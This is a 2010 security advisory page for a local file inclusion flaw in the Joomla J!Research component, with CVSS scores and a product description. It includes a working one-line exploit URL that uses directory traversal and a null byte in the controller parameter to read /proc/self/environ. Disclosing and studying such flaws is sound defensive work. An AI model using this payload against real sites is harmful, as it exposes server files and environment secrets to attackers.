The Joomla J!Research component local file inclusion

2010.03.24
Credit: Chip D3 Bi0s
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

--------------------------------------------------------------------------------- Joomla Component J!Research Local File Inclusion --------------------------------------------------------------------------------- Author : Chip D3 Bi0s Group : LatinHackTeam Email & msn : chipdebios[alt+64]gmail.com Date : 22 March 2010 Critical Lvl : Moderate Impact : Exposure of sensitive information Where : From Remote --------------------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : J!Research Developer : Luis Galrraga License : GPL type : Commercial more info : http://joomla-research.com/ Description : J!Research is a component for Joomla!�1.5 which allows for management of research-related work such as; publications, projects, and theses categorized by research area. The extension is oriented to University researchers and research departments which utilize or plan to adopt Joomla! as their content management system for publishing research. It includes several plugins which are installed automatically with the component: - Automatic citation plugin for TinyMCE editor - Generic automatic citation plugin (editors-xtd) for any editor. - Several plugins for persistence of cited records when writing documents. - Extended search to include J!Research items in searches It also includes support for several citation styles: APA, MLA, IEEE, Chicago and CSE. --------------------------------------------------------------------------- Vulnerable file: jresearch.php -------------------- how to exploit http://localhost/index.php?option=com_jresearch&controller=../../../../../../../../../../proc/self/environ%00 +++++++++++++++++++++++++++++++++++++++ [!] Produced in South America +++++++++++++++++++++++++++++++++++++++

References:

http://xforce.iss.net/xforce/xfdb/57123
http://www.securityfocus.com/bid/38917
http://secunia.com/advisories/39079
http://packetstormsecurity.org/1003-exploits/joomlajresearch-lfi.txt
http://osvdb.org/63147


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top